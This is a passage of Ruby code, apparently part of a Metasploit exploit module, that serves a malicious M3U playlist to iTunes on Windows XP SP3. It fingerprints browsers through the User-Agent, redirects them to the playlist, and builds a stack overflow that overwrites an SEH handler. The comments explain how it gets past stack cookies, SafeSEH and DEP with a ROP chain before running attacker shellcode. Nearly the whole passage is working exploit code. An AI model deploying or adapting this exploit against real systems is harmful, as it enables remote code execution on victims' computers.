if request.uri =~ /\.ico$/i
# Discard requests for ico files
send_not_found(cli)
#elsif agent =~ /iTunes\/10.6.1/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
elsif agent =~ /iTunes/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
# exploit iTunes (<= 10.6.1.7) on Windows XP SP3
send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
status(request,cli,"Sending playlist")
elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
# redirect MSIE to iTunes link
send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
status(request,cli,"Redirecting to playlist")
elsif agent =~ /NT 5\.1/
# redirect Firefox, Chrome, Opera, Safari to iTunes link
send_redirect(cli, m3u_location)
status(request,cli,"Redirecting to playlist")
else
send_not_found(cli)
print_status("Unknown User-Agent. Sending 404")
end
end
# IE did not proper redirect when retrieving an itms:// location redirect via a HTTP header...
# ... so use html
def generate_redirect_ie(m3u_location)
ie_redir = <<-HTML_REDIR
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="refresh" content="0; URL=#{m3u_location}">
</head>
</html>
HTML_REDIR
return ie_redir
end
# create the malicious playlist
def generate_m3u(payload)
# Bypass stack cookies by triggering a SEH exception before
# the cookie gets checked. SafeSEH is bypassed by using a non
# safeSEH DLL [QuickTime.qts v7.7.2]. DEP is bypassed by using ROP.
# stack buffer overflow ->
# overwrite SEH handler ->
# trigger SEH exception ->
# rewind stack (ADD ESP, ...) and land in ROP NOP sled ->
# virtualprotect and execute shellcode
target = targets[0]
m3u = '#EXTINF:,'
# stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
# ... so ensure we overwrite a SEH handler to get back to our rop chain
m3u << [target['SEH']].pack("V") * 0x6a # stack pivot/rewind
m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
m3u << gimme_rop
m3u << payload
# 0x1000 should be enough to overflow the stack and trigger SEH
m3u << rand_text_alphanumeric(0x1000 - m3u.length)
return m3u
end